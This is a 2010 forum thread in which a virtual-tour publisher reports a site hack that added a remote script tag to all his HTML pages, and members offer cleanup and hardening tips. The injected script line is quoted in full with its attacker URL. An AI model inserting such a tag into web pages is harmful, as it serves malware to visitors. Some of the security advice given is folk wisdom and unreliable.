Go Shopping Cart Site Map User Panel and Admin English Home

Home > Easypano Forum    Easypano Forum has been upgraded.

Easypano Forum

Welcome Guest Register Login Search The Forum Display List of Forum Members
 All Forums
  Tourweaver
       Forum Search Results

Subject Topic: Trojan virus in TW4 ? Post Reply Post New Topic
Message posted by realtor jerry on February-11-2010 at 1:07pm
View realtor jerry's Profile Profile   Search for other posts by realtor jerry Search   Visit realtor jerry's Homepage www   Quote realtor jerry Quote   Send Private Message Send Msg  
realtor jerry
Platinum Member
Platinum Member
United States
April-22-2007
880 Posts
I just tried to send out a flyer via a company that sends them to Realtors. They said when proofing the flyer, before sending it out, that they got a warning of a Trojan when they clicked on the link. I recall reading something about this on the forum but a search produced nothing. Does anyone have any information on this problem. I personnaly have never had a problem with it.

-------------
Nikon D300, D3s, Nikon 10.5 lens, RingT105N+Footplate+MrotatorTCPs, Giottos MT9261 Tripod, Manfrotto 410 Jr geared head.

If you know the "secret" then everyday is a good day!

Message posted by realtor jerry on February-11-2010 at 3:30pm
View realtor jerry's Profile Profile   Search for other posts by realtor jerry Search   Visit realtor jerry's Homepage www   Quote realtor jerry Quote   Send Private Message Send Msg  
realtor jerry
Platinum Member
Platinum Member
United States
April-22-2007
880 Posts

Update:
After over an hour on the phone with my hosting provider (Yahoo) and checking Google Webmaster Tools it seems that the following has been added to all of my html codes.
<script src=http://fernandomenezes.net/images/Na_balada.php ></script>
Does anyone know what this is or why it would be in my TW code?
When I remove it from the html it does not seem to have any effect on my tours.

-------------
Nikon D300, D3s, Nikon 10.5 lens, RingT105N+Footplate+MrotatorTCPs, Giottos MT9261 Tripod, Manfrotto 410 Jr geared head.

Message posted by smooth on February-11-2010 at 11:10pm
View smooth's Profile Profile   Search for other posts by smooth Search   Visit smooth's Homepage www   Quote smooth Quote   Send Private Message Send Msg  
smooth
Forum Moderator
Forum Moderator
Australia
November-23-2002
5401 Posts
Sounds like your server has been hacked and you will find that piece of code in multiple .html pages. Have you looked and more pages? As a rule these are normally pages that are index.html, default.html, contact.html normal pages that most websites will contain.

I would change your FTP passwords and remove any history from your FTP client along with the FTP client "stored" log-in information in case it is your computer that has been hacked or is sending out the passwords.

Regards, Smooth

Message posted by nerjaace on February-12-2010 at 3:29am
View nerjaace's Profile Profile   Search for other posts by nerjaace Search   Visit nerjaace's Homepage www   Quote nerjaace Quote   Send Private Message Send Msg  
nerjaace
Platinum Member
Platinum Member

May-10-2008
585 Posts
Also clear any Cookies :)

Message posted by realtor jerry on February-12-2010 at 3:02pm
realtor jerry
Platinum Member
Platinum Member
United States
April-22-2007
880 Posts

Thanks for the information.
Here is where I stand now:
I checked maybe 20 tours and they all have the above code added to the html page. This is also true of the slide shows I have published.
My tech guy says that it most likely did not come from my computer but from a third party that just hacked my site. I have scanned my computer with 3 different programs and they all say it is clean.
I had to sign in to "Google webmaster tools" and they gave me information on what to look for (the above code) and to just delete it. But seeing as how I have hundreds of pages with html that was nearly impossible. So I deleted a tour, that I knew had the code, from the server. Republished the tour and checked it and it was clean on the server. So, the only thing left to do was just republish everything to the server which over rode the existing pages. This took about 8 hours over high speed cable at night while I was asleep. This of course was after I changed the password. I did not know you could use symbols in addition to letters and numbers. So I added a bunch of symbols to my new password.
Checked it this morning and all pages are clean. Through the Google webmaster tools page I requested a "review" of my site. I am still waiting for them to remove the "This site may harm your computer" warning. Their forun says it should take no longer than 24 hours. They have reviewed and cleared the site but have not removed the warning.

I hope this information will help others that may run into this problem. 

-------------

Message posted by virtualsv on February-15-2010 at 3:40pm
View virtualsv's Profile Profile   Search for other posts by virtualsv Search   Visit virtualsv's Homepage www   Quote virtualsv Quote   Send Private Message Send Msg  
virtualsv
Gold Member
Gold Member
United States
June-09-2005
118 Posts
I had a similar situation. Make sure you add captcha code to any website that reaches you through email. What the robots do is they send you an email through your website, you open it. They track you and they than hack your website.

-------------
Miguel Martinez
Virtual Tour Designer
360 Design Studio (Formally known as VirtualSV)
support@360designstudio.com

Message posted by realtor jerry on February-15-2010 at 5:52pm
realtor jerry
Platinum Member
Platinum Member
United States
April-22-2007
880 Posts

Thanks for that bit of information.
What is the code and how do you add it, I'm not a techie in such matters.

-------------

Message posted by nerjaace on February-15-2010 at 6:15pm
View nerjaace's Profile Profile   Search for other posts by nerjaace Search   Visit nerjaace's Homepage www   Quote nerjaace Quote   Send Private Message Send Msg  
nerjaace
Platinum Member
Platinum Member

May-10-2008
585 Posts
Hi Jerry, another tip for you :)

At every directory level place a copy of your index.html file

For example if I go to your directory
http://realty360tours.com/pro_tour/ i can see and download all i can see. Have a look and you will see what i mean. Now if you ftp a copy of your index file into that directory anyone that tries to have nose around your files will always be sent to your home page by default. You can do the same at any level. If you have /images just drop a copy in there and it is safe from pryng eyes.

Many webmasters use an index file and simply write "Unauthorised access" or "Bog Off" on the page and place it in the directory.

:)

Message posted by realtor jerry on February-15-2010 at 6:29pm
realtor jerry
Platinum Member
Platinum Member
United States
April-22-2007
880 Posts
Thanks, you guys are getting way over my head.
I did Google Captcha code and understand that. But I don't think that would help as much as hurt business. If I had to go through a Captcha code to view a tour I would just bypass it. I don't have any forms to use on my site.
As for putting the "index file" into a directory, I just don't understand how to do that and don't understand what it is........ The FTP I use is through my site host (Yahoo hosting). 

-------------

Message posted by nerjaace on February-16-2010 at 4:43am
nerjaace
Platinum Member
Platinum Member

May-10-2008
585 Posts
Hi Jerry, your index file is your main home page. i.e
http://www.realty360tours.com/index.html

Just upload that index.html file into the various directories on your host. A similar process to uploading your VT's. You must have set up a directory called pro_tour or maybe Tourweaver created it but just find that directory and place a copy of the index.html file in there.

Hope it makes sense.

If you wish to post a reply to this thread you must first Login
If you are not already registered you must first register